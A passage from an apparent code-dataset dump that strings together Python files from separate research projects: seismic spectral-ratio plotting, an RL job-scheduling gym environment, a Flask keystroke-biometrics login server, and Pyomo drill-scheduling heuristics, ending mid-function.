ax.set_xlabel('Frequency (Hz)',fontsize=24,fontweight='bold')
ax.set_ylabel('Amplitude (nm/Hz)',fontsize=24,fontweight='bold')
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
ax.get_xaxis().get_major_formatter().labelOnlyBase = True
ax.get_xaxis().get_minor_formatter().labelOnlyBase = False
ax.tick_params(axis='x',which='minor',bottom='on')
ax.tick_params(axis='both',which='both',length=4.0)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
ax.legend(loc='lower left',ncol=1,prop={'size':17})
return None
def specrat_fit_plot(self,freqbin,specratio,mtpl,freqperturb,
allresidua1,ax,popt,maxy):
'''
Function to create the bottom right figure (axes) of the spectral
ratio plot. Individual spectral ratios of each station and the
representative spectral ratio for the event pair is organised and plotted
by this function.
'''
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from ..optimizer import specr_model
mtpl = mtpl
specratio = np.multiply(specratio,mtpl,dtype=float)
residua = np.power(np.subtract(specratio,specr_model(freqbin, *popt)),2)
residua = np.power(np.subtract(specratio,specr_model(freqbin, *popt)),2)
normresidua = np.sqrt(np.sum(residua)/np.sum(np.power(specratio,2)))
if popt.any():
ax.loglog(freqbin,np.divide(specr_model(freqbin, *popt),mtpl),
'g--', label='model fit',linewidth = 5)
ax.text(0.55,0.1,'M$_L$$_($$_1$$_)$ = %s' % self.evlist[self.mainev][1][3],
style = 'normal',weight='bold',size=14,transform=ax.transAxes)
ax.text(0.55,0.05,'M$_L$$_($$_2$$_)$ = %s' % self.evlist[self.egfev][1][3],
style = 'normal',weight='bold',size=14,transform=ax.transAxes)
ax.text(0.55,0.15,'rms = %.2f' %(normresidua),style = 'normal',
weight='bold',size=14,transform=ax.transAxes)
try:
xbin = np.where(freqbin >= popt[0])[0][0]
ybin = np.divide(specr_model(freqbin, *popt),mtpl)[xbin]
ax.text(popt[0]*0.95,ybin*1.25,'f$_c$$_($$_1$$_)$ = %s' \
%(float(round(popt[0],1))),style = 'normal',
weight='bold',size=14)
ax.loglog(popt[0]*1.0,ybin*1.12,marker="v",color='green',
markersize=10)
if self.showfc2.upper() == 'YES':
xbin2 = np.where(freqbin >= popt[1])[0][0]
ybin2 = np.divide(specr_model(freqbin, *popt),mtpl)[xbin2]
ax.text(popt[1]*0.55,ybin2*0.7,'f$_c$$_($$_2$$_)$ = %s' \
%(float(round(popt[1],1))),style = 'normal',
weight='bold',size=14)
ax.loglog(popt[1],ybin2*0.9,marker="^",color='green',
markersize=10)
except:
pass
upl = 10**(np.floor(np.log10(maxy*10)))
upl1 = 10**(np.floor(np.log10(maxy)))
if upl/upl1 > 20:
upl = 10**(np.floor(np.log10(maxy*10)))
ax.set_ylim([min(specratio)*0.15/mtpl,upl*3])#0.025
ax.get_xaxis().get_major_formatter().labelOnlyBase = True
ax.get_xaxis().get_minor_formatter().labelOnlyBase = True
ax.set_xlabel('Frequency (Hz)',fontsize = 24,fontweight='bold')
ax.set_ylabel('Spectral Ratio',fontsize = 24,fontweight='bold')
ax.legend(loc='upper left',ncol=1,prop={'size':20})
ax.tick_params(axis='both',which='both',length=5.)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
if ax:
inset_axin = inset_axes(ax,
width="30%",
height="25%",
loc=3,
borderpad=4.8)
tempx = []; tempy = []
for h in range(len(freqperturb)):
if allresidua1[h] < 0.57:
tempy.append(allresidua1[h])
tempx.append(freqperturb[h])
index1 = np.where(allresidua1 == min(allresidua1))[0][0]
y1 = allresidua1[index1]
x1 = freqperturb[index1]
inset_axin.semilogx(tempx,tempy,'o',ms=3,mfc = 'blue')
inset_axin.semilogx(x1,y1,'*',mfc='blue',ms=8,mec='red')
bb = np.floor(np.log10(min(tempx)))#.round()-1
inset_axin.set_xlim([(10**bb)*5,max(tempx)*2])
inset_axin.xaxis.set_major_locator(LogLocator(base=10.0, numticks=3))
inset_axin.set_ylim([0,0.6])
inset_axin.set_yticks(np.linspace(0,0.6,endpoint=True,num=4))
inset_axin.set_xlabel('Corner Frequency (Hz)',fontsize = 13,fontweight='bold')
inset_axin.set_ylabel('RMS',fontsize = 13,fontweight='bold')
inset_axin.get_xaxis().get_major_formatter().labelOnlyBase = True
inset_axin.get_xaxis().get_minor_formatter().labelOnlyBase = True
inset_axin.tick_params(axis='both',which='both',length=3.5)
for tick in inset_axin.xaxis.get_major_ticks():
tick.label.set_fontsize(11)
for tick in inset_axin.yaxis.get_major_ticks():
tick.label.set_fontsize(11)
ax.legend(loc='upper right',ncol=4,prop={'size':11})
return None
def make_figures_ind(self,wm,wmfc,wmn,trtm,wv):
'''
Handler for individual spectra analysis spectral fitting and figure
creation.
Input:
-------
wm --> individual signal spectra
wmfc --> individual signal spectra frequency bins
wmn --> individual noise spectra
trtm --> Travel times of the events contained in wm
wv --> wave type (P or S)
Returns:
---------
It returns None but fits individual spectra and dispatches spectrum
fitting results.
'''
colornum = 0
fig = plt.figure(figsize=(16,10),tight_layout=True)
lste = list(wm.keys())
colortype = colorlist(len(lste))
n = 1; m = 1
for index in range(len(lste)):
station = lste[index]
fn = wmfc[lste[index]]
try:
if self.numworkers <= 1:
popt_ind,pcov_ind = fit_sin_spec(wm[lste[index]],fn,station,
min(wmfc[lste[index]]),
max(wmfc[lste[index]])*2.5,
trtm[lste[index]],
self.autofit_single_spec,
self.source_model)
elif self.numworkers > 1:
popt_ind,pcov_ind = fit_sin_spec_pll(wm[lste[index]],fn,station,
min(wmfc[lste[index]]),
max(wmfc[lste[index]])*2.5,
trtm[lste[index]],
self.source_model,self.numworkers)
axx2 = fig.add_subplot(2,3,n)
if fn[0] == 0:
bb = fn[1]
else:
bb = fn[0]
# bb = np.floor(np.log10(min(fn)))
x_end = self.stationlist[station]['pre_filt'][2]
axx2.set_xlim([bb,x_end])
fig.subplots_adjust(hspace = .2,wspace = 0.0)
dlim = int(min(len(wmfc[lste[index]]),len(wmn[lste[index]])) - 1)
axx2.loglog(wmfc[lste[index]][0:dlim],wm[lste[index]][0:dlim],linewidth = 1,color = colortype[colornum],label = 'data')
axx2.loglog(fn, sinspec_model(fn, *popt_ind), 'k--', label='model fit',
linewidth=2)
axx2.loglog(wmfc[lste[index]][0:dlim],wmn[lste[index]][0:dlim],linewidth = 1,color = 'gray',alpha = 0.6,label = 'noise')
axx2.get_xaxis().get_major_formatter().labelOnlyBase = True
axx2.get_xaxis().get_minor_formatter().labelOnlyBase = False
axx2.tick_params(axis='x',which='minor',bottom='on')
axx2.tick_params(labelsize='large')
for tick in axx2.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in axx2.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
axx2.set_xlabel('Frequency (Hz)',fontsize=24)
axx2.set_ylabel('Amplitude (nm/Hz)',fontsize=24)
axx2.legend(loc='lower left',ncol=1,prop={'size':18})
axx2.text(0.2, 0.5, station,fontsize=20, horizontalalignment='center',verticalalignment='center', transform=axx2.transAxes)
lm,hm = axx2.get_ylim()
axx2.set_ylim([lm,hm*10])
try:
xbin = np.where(fn >= popt_ind[1])[0][0]
except:
fig.delaxes(fig.axes[len(fig.axes)-1])
pass
axx2.text(popt_ind[1]*.8,wm[lste[index]][xbin]*1.8,'f$_c$ = %s' %(float(round(popt_ind[1],1))),style = 'normal',weight='bold',size=17)
axx2.loglog(popt_ind[1],wm[lste[index]][xbin]*1.2,marker="v",color='green',markersize=10)
axx2.yaxis.set_major_locator(LogLocator(base=10.0, numticks=4))
axx2.text(0.6,0.2,'%s wave' % wv,style = 'normal',weight='bold',size=16,transform=axx2.transAxes)
colornum += 1
if pcov_ind[0] is not None:
save_output(self,None,None, None,popt_ind, pcov_ind,station,wv)
# popt_ind,pcov_ind = [],[]
n = len(fig.axes)+1
if n > 6:
save_fig(self,fig,'ind', m,wv)
plt.close()
fig = plt.figure(figsize=(16,10),tight_layout=True)
n = 1
m += 1
except:
pass
try:
if fig.axes[0]:
save_fig(self,fig,'ind',m,wv)
plt.close()
except:
pass
return None
def stf_plot(self,x,y,wv):
'''
Designed to handle source time function plots but this option is not
yet activated, stay tuned!
'''
# y = [i*np.sign(i) for i in y]
fig = plt.figure(figsize=(6,3))
ax = fig.add_subplot(111)
ax.plot(x,y,'k',linewidth=1.5)
ax.set_xlabel('Time (s)',fontsize=20)
ax.fill_between(x, y, facecolor='gray', alpha=0.5)
for tick in ax.xaxis.get_major_ticks():tick.label.set_fontsize(18)
for tick in ax.yaxis.get_major_ticks():tick.label.set_fontsize(18)
save_fig(self,fig,'stf',None,wv)
return None
def save_fig(self,fig,figtype,mm,wv):
'''
All created figures are saved to by this function. The default dpi
for each figure is 300.
'''
if figtype == 'spec':
fig.subplots_adjust(hspace = .1,wspace=0.1)
fig.tight_layout()
imagefile = self.output_dir+self.mainev+'_'+self.egfev+'_'+wv+'_'+str(mm)+'.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
if figtype == 'ind':
imagefile = self.output_dir+self.mainev+'_sinspec_'+wv+'_'+str(mm)+'.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
if figtype == 'stf':
imagefile = self.output_dir+self.mainev+'_'+self.egfev+'_'+wv+'_STF.pdf'
fig.savefig(imagefile, format='pdf', dpi=300)
fig.clf()
return None
```
#### File: src/analyzer/get_good_snr_freq_range.py
```python
import numpy as np
def get_good_snr_freq_range(snrthres,signal1,signal2,snr1,snr2,freqsignal1,freqsignal2,noise1,noise2):
"""
Function to determine useable frequency range of spectra based on the
signal-to-noise ratio [SNR]
Inputs:
---------
snrthres: user-defined SNR (defaults to 2)
signal1: signal spectrum of event 1
signal2: signal spectrum of event 2 (if available)
snr1: SNR of event 1
snr2: SNR of event 2 (if available)
freqsignal1: frequency bins of signal 1
freqsignal2: frequency bins of signal 2
noise1: noise spectrum of event 1
noise2: noise spectrum of event 2
Returns:
----------
datas: signal1 windowed over frequency range where SNR threshold is meet or surpassed
datae: signal2 (if available) windowed over frequency range where SNR threshold is meet or surpassed
fnm: frequency range of signal1 where SNR threshold is meet or surpassed
fne: frequency range of signal2 where SNR threshold is meet or surpassed
noisem: event1 noise windowed over frequency range where SNR threshold is meet or surpassed
noisee: event2 noise windowed over frequency range where SNR threshold is meet or surpassed
Note: fnm and fne exactly the same when analysing spectral ratios; fne is
None when analysing single spectrum
"""
datas = None; datae = None; fnm = None; fne = None;
noisem = None; noisee = None;
quit_calc = 'N'
try:
try:
spm_low = np.where(snr1 >= snrthres )[0][0]
except:
spm_low = 0
try:
half_up = snr1[slice(spm_low,len(snr1)-1)]
spm_high = np.where(half_up < snrthres )[0][0] + spm_low
except:
spm_high = len(snr1) - 1
except:
quit_calc = 'Y'
pass
if signal2 is not None:
try:
spe_low = np.where(snr2 >= snrthres)[0][0]
except:
spe_low = 0
try:
half_up = snr2[slice(spe_low,len(snr2)-1)]
spe_high = np.where(half_up < snrthres )[0][0] + spe_low
except:
spe_high = len(snr2) - 1
low_end = max(spe_low,spm_low)
high_end = min(spe_high,spm_high)
fnm = freqsignal1[slice(low_end,high_end)] # change to sp later
fne = freqsignal2[slice(low_end,high_end)]
datas = signal1[slice(low_end,high_end)] # change to sp later
datae = signal2[slice(low_end,high_end)]
noisem = noise1[slice(low_end,high_end)]
noisee = noise2[slice(low_end,high_end)]
else:
if quit_calc == 'N':
fnm = freqsignal1[slice(spm_low,spm_high)] # change to sp later
datas = signal1[slice(spm_low,spm_high)] # change to sp later
noisem = noise1[slice(spm_low,spm_high)]
return datas,datae,fnm,fne,noisem,noisee
```
#### File: src/saesutils/get_prefilts.py
```python
import numpy as np
import re
def get_prefilts(self):
"""
Description:
------------
Read the pre-defined response removal frequency range for each station.
"""
prefilts = open(self.maindir+'/input/pre_filt.list').readlines()
list1 = [list(filter(None, re.split('[: \n#]',prefilts[j])))[0] for j in range(len(prefilts)-1) if prefilts[j] != '\n']
list2 = [list(filter(None, re.split('[: \n#]',prefilts[j])))[1] for j in range(len(prefilts)-1) if prefilts[j] != '\n']
list1 = np.asarray(list1)
list2 = np.asarray(list2)
for i in range(len(list1)):
try:
prefilt = [float(j) for j in list2[i][1:-1].split(',')]
if len(prefilt) == 4:
self.stationlist[list1[i]]['pre_filt'] = prefilt
except:
prefilt = None
pass
return None
```
#### File: src/saesutils/get_time_window.py
```python
import numpy as np
def get_time_window(mag):
"""
Description:
------------
This is to estimate a time-window based on the magnitude of the event.
keeping in mind that in adherence to Parseval theorem, the minimum
resolvable frequency is the inverse of the data length in second. Here we
assume Vs = 3.75, future release with use maybe iasp91 velocity model or
user-defined velocity model. We assume a constant stress drop of 10 MPa
and Brune's model.
Parameters:
----------
mag --> earthquake magnitude.
Returns/Modificatoins:
----------------------
time_win --> time window.
"""
Vs = 3750.
fc = 0.37*Vs*(16*0.1*1e6/(7*np.power(10,(1.5*(mag + 6.073)))))**(1./3.)
time_win = np.floor(1./fc)
if time_win < 1.0:
time_win = 1.0
return 2.*time_win
```
#### File: src/saesutils/read_eventlist.py
```python
import numpy as np
from obspy.core import UTCDateTime
def read_eventlist(self):
"""
Description:
------------
Read events infomation.
Input:
-------
events.dat:
year month day hour minute second lat lon depth magnitude eventID
Returns:
---------
None
"""
data = np.genfromtxt(self.maindir+'/input/events.dat',skip_header=1,dtype='U24')
if self.whitelist_evl and not self.blacklist_evl:
evids = self.whitelist_evl
elif self.whitelist_evl and self.blacklist_evl:
evids = [i for i in self.whitelist_evl if i not in self.blacklist_evl]
elif self.blacklist_evl and not self.whitelist_evl:
evids = [str(int(data[i][10])) for i in range(len(data)) if str(int(data[i][10])) not in self.blacklist_evl]
else:
evids = [str(int(data[i][10])) for i in range(len(data))]
allids = np.asarray([str(int(data[i][10])) for i in range(len(data))])
times,metadata = [],[]
for i in range(len(evids)):
index = np.where(allids == evids[i])[0]
if index.size > 0:
index = index[0]
times.append(UTCDateTime(int(data[index][0]),int(data[index][1]),int(data[index][2]),int(data[index][3]),
int(data[index][4]),float(data[index][5])))
metadata.append([float(data[index][6]),float(data[index][7]),float(data[index][8]),float(data[index][9])])
for i,j,k in zip(evids,times,metadata):
self.evlist[i] = []
self.evlist[i].append(j)
self.evlist[i].append(k)
return None
``` |
{
"source": "JoHussien/rl_mc_scheduler",
"score": 2
} |
#### File: Designning the System Latest/env/job_gen_env_v2.py
```python
import numpy as np
import gym
from gym.utils import seeding
from gym.spaces import Box, MultiBinary, Discrete, Dict, flatten, flatten_space
from env.job_generator import create_workload
class MCEnv(object):
pass
class MCEnv(gym.Env):
def __init__(self, env_config= {'job_num': 10, 'total_load': 0.4, 'lo_per': 0.3, 'job_density': 4}):
#add here description of each parameter
self.time = 0
self.job_num = env_config['job_num']
self.total_load = np.random.uniform(low=0.1, high=0.9)#env_config['total_load']
self.lo_per = np.random.uniform(high=1-2/(self.job_num)) #env_config['lo_per']
self.job_density = env_config['job_density']
self.speed = 1
workload = create_workload(self.job_num, self.total_load, self.lo_per, self.job_density)
workload = np.insert(workload, 4, [0] * self.job_num, axis=1)
workload = np.insert(workload, 5, [0] * self.job_num, axis=1)
workload = np.insert(workload, 6, [0] * self.job_num, axis=1)
self.workload = np.abs(workload) #negative processing time
self.action_space = Discrete(self.job_num)
self.observation_space_dict = Dict({
'action_mask': Box(0, 1, shape=(self.job_num,)),
'MCenv': Dict({
'RDP_jobs': Box(low=0, high=np.inf, shape=(self.job_num, 3)),
'CRSE_jobs': MultiBinary(self.job_num*4),
'Processor': Box(low=np.array([0., 0.]), high=np.array([1, np.inf])),
})
})
self.observation_space = flatten_space(self.observation_space_dict)
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
self.workload[:, 5][self.time + self.workload[:, 2]/self.speed > self.workload[:, 1]] = 1 #jobs that can't be done anyway
#TODO: handle cases of multiple switches between degradation and normal execution
self.degradation_schedule = np.random.uniform(high=np.sum(workload[:, 2]))
self.degradation_speed = np.random.uniform(low=self.total_load)
self.action_mask = np.ones(self.job_num)
self.seed()
def fill_buffer(self,workload):
#Logic each time we enter here we append the released jobs only and the size of this buffer currently is 5 as the jobs we generate
#are 10, also wehn we fill we pass this to the step where the job to be sleected must be from the buffer not the workload
#Then we update the time based on the chosen job and afterwards we refill the buffer
#Ofcourse the job we selected before won't be selected again as it will be starved and the choice of a specific job will reflected
#on the next time we try to select a job from the buffer
#regarding the reward we should see which starved from the self.workload and what was excuted as if a job was selected it must
#be added to another buffer "Chosen" in order to know at the final which was selected and which ws starved
#Will make the size of the buffer 5
last_deadline=self.workload[self.job_num-1][1]
nop=np.array([last_deadline,last_deadline+1,2,0,0,0,0])
added=0
for job in workload:
if((job[0]>=self.time) and (job[5]==0) and (len(self.buffer)<5)): #Released and not starved and still there is a space
self.buffer.append(job)
added = added + 1
for el in range(5-len(self.buffer)):
self.buffer.append(nop)
return self.buffer
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def step(self, action):
#define step logic
done = self._done()
prev_workload = np.copy(self.workload)
reward = 0
buffer=self.fill_buffer(self.workload) #Now we should replace each self.workload with buffer
self.chosen.append(buffer[action]) #To know at the end what was scheduled
self.buffer.pop
if self.workload[action, 5] or self.workload[action, 6]:
return self._get_obs(), -10, done, {}
#reward = -10
else:
time = max(self.time, self.workload[action, 0])
if time >= self.degradation_schedule:
self.speed = self.degradation_speed
time += self.workload[action, 2] / self.speed
elif self.workload[action, 2] + time < self.degradation_schedule:
time += self.workload[action, 2]
else:
time_in_norm = self.degradation_schedule - time
self.speed = self.degradation_speed
time_in_deg = (self.workload[action][2] - time_in_norm) / self.speed
time += time_in_norm + time_in_deg
# double check, as in case of degradation, time will not increment properly which might lead to the starvation a job unexpectedly
if time <= self.workload[action, 1]:
self.time = time
self.workload[action, 6] = 1
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
starved_condition = (self.time >= self.workload[:, 1]) * (1 - self.workload[:, 6]).astype(bool)
self.workload[:, 5][starved_condition] = 1
will_starve_condition = (self.time + self.workload[:, 2] / self.speed > self.workload[:, 1]) \
* (1 - self.workload[:, 6]).astype(bool)
self.workload[:, 5][will_starve_condition] = 1
done = self._done()
# reward = -np.sum((self.workload[:, 5] - prev_workload[:, 5])*self.reward_weights)
if done and self.workload[self.workload[:, 3].astype(bool), 6].all():
reward += np.sum(self.workload[:, 6])
return self._get_obs(), reward, done, {}
def _update_available(self):
self.action_mask[self.workload[:, 5].astype(bool) | self.workload[:, 6].astype(bool)] = 0
def _get_obs(self):
self._update_available()
obs_dict = dict({'action_mask': self.action_mask, 'MCenv': dict(
{'RDP_jobs': np.array(self.workload[:, :3]),
'CRSE_jobs': np.array(self.workload[:, 3:]).flatten(),
'Processor': np.array([1, 0]).flatten()})
})
return obs_dict #flatten(self.observation_space_dict, obs_dict)
def reset(self):
self.time = 0
self.speed = 1
self.total_load = np.random.uniform(low=0.2, high=0.9) # env_config['total_load']
self.lo_per = np.random.uniform(high=1 - 2 / (self.job_num)) # env_config['lo_per']
workload = create_workload(self.job_num, self.total_load, self.lo_per, self.job_density)
workload = np.insert(workload, 4, [0] * self.job_num, axis=1) #Released
workload = np.insert(workload, 5, [0] * self.job_num, axis=1) #Starved
workload = np.insert(workload, 6, [0] * self.job_num, axis=1) #Excuted
self.workload = np.abs(workload)
self.workload[:, 4][self.time >= self.workload[:, 0]] = 1
self.workload[:, 5][self.time + self.workload[:, 2]/self.speed > self.workload[:, 1]] = 1
self.degradation_schedule = np.random.uniform(high=np.sum(workload[:, 2]))
self.degradation_speed = np.random.uniform(low=self.total_load)
self.action_mask = np.ones(self.job_num)
return self._get_obs()
def _done(self):
return bool((self.workload[:, 5].astype(bool) | self.workload[:, 6].astype(bool)).all())
def get_workload(self):
print(self.workload)
``` |
{
"source": "johwconst/DKA",
"score": 2
} |
#### File: DKA/webservice/server.py
```python
from database.db_connect import drop_db, create_db, add_user_and_passw, check_user_and_passw, get_user_id
from knn_sdk.ClassificadorKNN import Classificador
import datetime
import csv
from flask import Flask, render_template, request, jsonify, url_for
TYPING_DATA_PATH = './database/biometria.csv' # Pasta onde serรก salvo os dados .csv e banco
LOG_NAME = 'resultados.log'
K = 1
SPLIT = 0.8
app = Flask(__name__, static_folder='./static')
@app.route('/')
def home():
return render_template('./home/home.html')
@app.route('/cadastro', methods = ['GET', 'POST'])
def cadastro():
if request.method == 'GET':
return render_template('./cadastro/cadastro.html')
elif request.method == 'POST':
response = dict(request.get_json())
username = response['username']
password = response['password']
id, result = add_user_and_passw(username, password)
if result:
return jsonify({'cadastro_cod': 'UserRegistrySuccess', 'id_usuario': id})
else:
return jsonify({'cadastro_cod': 'UsernameAlreadyExist'})
@app.route('/cadastro/biometria', methods = ['POST'])
def biometria():
if request.method == 'POST':
response = dict(request.get_json())
user_id = response['user_id']
data = response['data']
data.append(user_id) # adiciona o user id ao fim da lista
try:
with open(TYPING_DATA_PATH, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(data)
return jsonify({'biometric_cod': 'Success'})
except:
return jsonify({'biometric_cod': 'Nรฃo foi possivel cadastrar os dados biometricos'})
@app.route('/treinar/biometria', methods = ['POST'])
def treinar():
if request.method == 'POST':
response = dict(request.get_json())
username = response['username']
data = response['data']
user_id = get_user_id(username)
if user_id == None: #Caso seja digitado um usuario nรฃo cadastrado no treinamento, ainda ssim aproveitar os dados.
user_id = 999
data.append(user_id) # adiciona o user id ao fim da lista
try:
with open(TYPING_DATA_PATH, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(data)
return jsonify({'biometric_cod': 'Success'})
except:
return jsonify({'biometric_cod': 'Nรฃo foi possivel cadastrar os dados biometricos'})
@app.route('/login', methods = ['GET'])
def login():
return render_template('./login/login.html')
@app.route('/login/auth1', methods = ['POST']) # Rota para a primeira autenticaรงรฃo
def auth1():
response = dict(request.get_json())
username = response['username']
password = response['password']
id, result, user_id = check_user_and_passw(username, password)
if result:
return jsonify({'auth1_code': 'success', 'id_usuario': user_id})
else:
if id == 3:
return jsonify({'auth1_code': 'UsernameNotExist'})
elif id == 1:
return jsonify({'auth1_code': 'PasswordIsWrong'})
@app.route('/login/auth2', methods = ['POST']) # Rota para a segunda autenticaรงรฃo
def auth2():
response = dict(request.get_json())
amostra_digitacao = response['typing_data']
user_id = response['user_id']
##### Classificaรงรฃo
classifica = Classificador(TYPING_DATA_PATH, amostra_digitacao, SPLIT, K)
resultado = classifica.knn_manhattan_sem_treino()
cross_val_score = classifica.get_cv_score()
if str(user_id) in resultado[0]:
match = True
else:
match = False
data_hora_atual = datetime.datetime.now()
data_atual = data_hora_atual.strftime("%d/%m/%Y %H:%M:%S ")
with open(LOG_NAME, 'a') as arquivo: # Cria o arquivo de log
arquivo.write('[+] Usuario Real: ')
arquivo.write(str(user_id))
arquivo.write(' | Usuario Previsto: ')
arquivo.write(str(resultado[0]))
arquivo.write(' | Algoritimo: ')
arquivo.write(str(resultado[2]))
arquivo.write(' | Valor de K: ')
arquivo.write(str(K))
arquivo.write(' | Match: ')
arquivo.write(str(match))
arquivo.write(' | Accuracy: ')
arquivo.write(str(cross_val_score))
arquivo.write(' | Data: ')
arquivo.write(data_atual)
arquivo.write('\n')
return jsonify({'user_id':str(user_id), 'predict': resultado[0], 'accuracy': cross_val_score, 'result': str(match), 'algoritimo': resultado[2]})
@app.route('/treinar', methods = ['GET', 'POST'])
def treina_bio():
if request.method == 'GET':
return render_template('./treinamento/treinamento.html')
@app.route('/best_params', methods = ['GET'])
def best_params():
return render_template('./best_params/best_params.html')
@app.route('/best_params/result', methods = ['GET'])
def best_params_result():
amostra_digitacao = '' # Aritificio para permitir a utilizaรงรฃo da classe
classifica = Classificador(TYPING_DATA_PATH, amostra_digitacao, 0.7, 3)
best_score, best_params, best_estimator = classifica.hyper_parameters_tuning()
data_hora_atual = datetime.datetime.now()
data_atual = data_hora_atual.strftime("%d/%m/%Y %H:%M:%S ")
with open(LOG_NAME, 'a') as arquivo: # Cria o arquivo de log
arquivo.write('[+] Best Score: ')
arquivo.write(str(best_score))
arquivo.write(' | Best Params: ')
arquivo.write(str(best_params))
arquivo.write(' | Best Estimator: ')
arquivo.write(str(best_estimator))
arquivo.write(' | Data: ')
arquivo.write(data_atual)
arquivo.write('\n')
return jsonify({'best_score':str(best_score), 'best_params': str(best_params), 'best_estimator': str(best_estimator) })
# Server Start
if __name__ == '__main__':
app.run(host='127.0.0.1', debug=True, port=3000)
``` |
{
"source": "johwiebe/drill-scheduling",
"score": 3
} |
#### File: johwiebe/drill-scheduling/algorithms.py
```python
import copy
import time
import numpy as np
def no_degradation_heuristic(s, Rmax=10):
s.build(Rmax=Rmax)
s.multisolve()
s = reconstruct_r(s)
return s
def no_degradation_start_heuristic(s):
t_start = time.time()
s = no_degradation_heuristic(s)
Xmax = get_maintenance_locations(s)
s.build(Xm=Xmax)
s.multisolve()
s.time = time.time() - t_start
return s, s.m.Obj()
def boundary_heuristic(s):
t_start = time.time()
s = no_degradation_heuristic(s)
Xm = get_maintenance_locations(s)
best_obj = float('Inf')
best_s = None
n_iter = 0
done = False
# Iterate until all # of maint have been explored
while not done:
# Iterate while optimal maint. is at segment bound
at_bound = True
while at_bound:
s.build(Xm=Xm)
s.multisolve()
print(Xm)
n_iter += 1
if s.m.Obj() < best_obj:
best_s = copy.copy(s)
best_obj = s.m.Obj()
Xm, at_bound = check_if_at_bound(s)
if len(Xm) > 0:
Xm.pop(0)
else:
done = True
best_s.n_iter = n_iter
best_s.time = time.time() - t_start
return best_s, best_obj
def midpoints(xstart, xfin, n):
eps = (np.array(range(n)) + 1)/(n + 1)
x = xstart + (xfin - xstart)*eps
return x.tolist()
def Xm_from_Nm(X, Nm):
Xm = []
for n in set(Nm):
Xm += midpoints(X[n], X[n+1], Nm.count(n))
Xm.sort()
return Xm
def enum(s):
t_start = time.time()
s = no_degradation_heuristic(s)
geo = s.geology
X = geo.transitions + [s.xfin]
Xmax = get_maintenance_locations(s)
Nmax = [geo.segment(x) for x in Xmax]
s.build(Xm=Xmax)
s.multisolve()
best_s = copy.copy(s)
best_obj = s.m.Obj()
n_iter = 0
for m in reversed(range(len(Xmax))):
Nm = [0] * (m + 1)
Nmax = Nmax[-(m + 1):]
i = m
while not Nm == Nmax:
if Nm[i] < Nmax[i]:
Nm[i:] = [Nm[i] + 1] * (m + 1 - i)
i = m
Xm = Xm_from_Nm(X, Nm)
print(Xm, Nm, Nmax)
s.build(Xm=Xm)
s.multisolve()
n_iter += 1
if s.m.Obj() <= best_obj and s.opt > 0:
best_s = copy.copy(s)
best_obj = s.m.Obj()
else:
i -= 1
s.build(Xm=[])
s.multisolve()
if s.m.Obj() <= best_obj and s.opt > 0:
best_s = copy.copy(s)
best_obj = s.m.Obj()
best_s.n_iter = n_iter
best_s.time = time.time() - t_start
return best_s, best_obj
def reconstruct_r(s):
R = s.m.R[s.X[-2]]()
xfin = s.X[-1]
for x in reversed(s.X[:-1]):
s.m.R[x].value = R
r = s.m.r[x]()
rop = s.m.rop[x].V()
dx = xfin - x
R = R - dx/rop*r
xfin = x
return s
def get_maintenance_locations(m):
df = m.get_schedule()
R = df['R'].max()
RR = df['R'].tolist()
RR.insert(0, 0)
X = df['x'].tolist()
X.append(m.xfin)
Xm = []
while R > 1:
R -= 1
i = df[df['R'] >= R].index[0]
dx = X[i+1] - X[i]
dR = RR[i+1] - RR[i]
Xm.append(X[i] + dx * (R - RR[i])/dR)
Xm.sort()
return Xm
def to_number(x):
if not isinstance(x, (int, float)):
x = x.value
return x
def check_if_at_bound(m):
Xm = []
X = [to_number(x) for x in m.Xvar]
at_bound = False
tol = 10e-3
for i, x in enumerate(m.Xvar):
if not isinstance(x, (int, float)):
# Drop maint if it is at xstart or xfin
if X[i] - X[0] < tol or X[-1] - X[i] < tol:
at_bound = True
# Move to previous segment if at min bound
elif X[i] - X[i-1] < tol:
Xm.append((X[i-1] + X[i-2])/2)
at_bound = True
# Move to next segment if at max bound
elif X[i+1] - X[i] < tol:
Xm.append((X[i+1] + X[i+2])/2)
at_bound = True
# Keep it where it is if not at bound
else:
Xm.append(X[i])
Xm.sort()
return Xm, at_bound
```
#### File: johwiebe/drill-scheduling/geology.py
```python
import bisect
class Rock():
""" Stores rock parameters for Detournay bit-rock interaction model. """
def __init__(self, Sstar, wstar, xieps, mugam, betaw, xi):
self.Sstar = Sstar
self.wstar = wstar
self.xieps = xieps
self.mugam = mugam
self.betaw = betaw
self.xi = xi
class Geology():
""" Stores geology as a list of rock types. """
def __init__(self, data):
self.data = data
self.transitions = list(data.keys())
self.transitions.sort()
def lookup(self, x):
""" Look up rock parameters at depth/length x. """
key = max(key for key in self.data.keys() if x - key >= 0)
return self.data[key]
def __call__(self, x):
return self.lookup(x)
def segment(self, x):
return bisect.bisect_left(self.transitions, x) - 1
def midpoint(self, i, xfin):
trans = self.transitions + [xfin]
return (trans[i+1] + trans[i])/2
def start(self, i):
return self.transitions[i]
```
#### File: johwiebe/drill-scheduling/ropo.py
```python
import time
import pyomo.environ as p
class ROPO():
"""
Connect ROP to weight-on-bit and drill string rotational speed.
Args:
rock: Rock object
drillstring: DrillString object
m: pyomo model/block to use (for use within scheduling model)
"""
def __init__(self, rock, drillstring, m=None, piecewise=False):
if m is None:
# Initialize pyomo model if none was provided
self.m = p.ConcreteModel()
else:
self.m = m
self.bit = drillstring.bit
self.pdm = drillstring.pdm
self.rock = rock
self.m.cons = p.ConstraintList()
# Add variables, constraints and objective to model
self.add_vars(piecewise=piecewise)
self.add_cons(piecewise=piecewise)
if m is None:
self.add_obj()
# TODO: this seems to be obsolete?
def build_block(self, piecewise=False):
b = p.block()
self.add_vars(b, piecewise=piecewise)
self.add_cons(b, piecewise=piecewise)
def add_vars(self, piecewise=False):
